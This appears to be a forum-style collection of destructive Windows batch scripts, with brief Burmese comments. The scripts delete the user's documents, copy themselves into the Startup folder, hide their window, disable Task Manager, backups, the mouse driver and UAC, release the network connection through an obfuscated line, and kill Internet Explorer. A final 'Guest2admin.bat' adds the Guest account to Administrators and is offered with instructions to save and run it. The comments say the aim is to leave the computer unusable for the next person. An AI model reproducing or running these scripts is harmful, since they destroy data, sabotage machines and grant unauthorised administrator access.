@
echo off rem --------------------------------- rem Delete My Documents del
/f /q '%userprofile%\My Documents\*.*' rem
--------------------------------- Infect startup
@
echo off rem
--------------------------------- rem
Infect Startup Folder copy
%0 "%userprofile%\Start Menu\Programs\Startup" rem
--------------------------------- Crash computer
@
echo off rem
--------------------------------- rem
Hide CMD Window if
exist winstart.vbs goto next echo
set objShell = CreateObject("WScript.Shell") >> winstart.vbs echo
objShell.Run ".bat", vbHide, TRUE >> winstart.vbs start
"" "winstart.vbs" exit :next rem
---------------------------------
Disable task manager @
echo off rem
--------------------------------- rem
Disable Task Manager reg
add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
/v DisableTaskMgr /t REG_SZ /d 1 /f >nul rem
---------------------------------
Disable windows backup
@
echo off rem
--------------------------------- rem
Disable Windows Backup net
stop "SDRSVC" rem
---------------------------------
ကိုယ္က ဒါေလးကို run ထားခဲ့ ရင္ ကိုယ္သံုးတဲ့
အလံုးမွာ disable internet အင္တာနက္သံုးမရေတာ့ဘူး
ကိုယ္ကေရ်ကသံုးျပီးသြားရင္ ေနာက္ကလူသံုးမရေတာ့ေအာင္စလို့ရတာေပါ့
@
echo off rem
--------------------------------- rem
Disable Internet @Echo
off & @@Break Off Ipconfig
/release %jUmP%E%nD%c%onFiG%h%IdE%o%P%
h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?! P%ReSs%%IE%AuS%ExPloR%e%r%
> nul.%TempInternetRelease% rem
---------------------------------
Disable mouse ကိုယ့္ရဲ့ mouse လံုး၀ကြန္ပ်ူတာနဲ့
ခိပ္ဆက္သံုးမရေတာေအာင္လုတ္တဲ့ script @ echo off rem
--------------------------------- rem
Disable Mouse set
key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg
delete %key% reg
add %key% /v Start /t REG_DWORD /d 4 rem
---------------------------------
Disable admin accounts
@echo
off rem
--------------------------------- rem
Disable Admin Accounts @Set
RegistyEditCmd=Cmd /k Reg Add @Set
HiveSysKey=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System @%RegistyEditCmd%
"%HiveSysKey%" /v "EnableLUA" /t "REG_DWORD" /d
"0" /f > nul rem
---------------------------------
Kill IE
internet explorer သံုမရေအာင္လုတ္မယ္ @ echo off rem
--------------------------------- rem
Kill Internet Explorer tskill
iexplore rem
---------------------------------
hack guest admin
echo off
title Please wait...
cls net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add del %0 Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...